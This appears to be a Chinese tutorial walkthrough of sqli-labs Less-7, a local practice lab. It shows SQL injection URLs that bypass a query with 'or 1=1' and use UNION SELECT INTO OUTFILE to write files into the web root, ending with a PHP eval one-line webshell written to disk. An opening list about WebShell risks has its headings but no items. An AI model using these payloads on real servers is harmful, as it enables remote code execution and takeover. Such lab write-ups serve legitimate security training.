赞
踩
WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。
它具有以下特点:
WebShell 带来的危害包括:
防范 WebShell 的方法有:
保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。
Use outfile
意思是本关我们利用文件导入的方式进行注入。
2. 尝试注入
http://localhost/sqli-labs/Less-7/?id=1%27))%20or%201=1--+
3. 利用文件导入的方式进行注入。
http://localhost/sqli-labs/Less-7/?id=1%27))union%20select%201,2,3%20into%20outfile%20%22f:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\attack.txt%22--+%20%20limit%200,1%20
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了
secure_file_priv=
绝对路径,重启数据库后方可注入。http://localhost/sqli-labs/Less-7/?id=1%27))union%20select%201,2,%27%3C?php%20@eval($%20post%20[%22post%22])?%3E%27%20into%20outfile%20%22f:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\attack01.txt%22--+
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。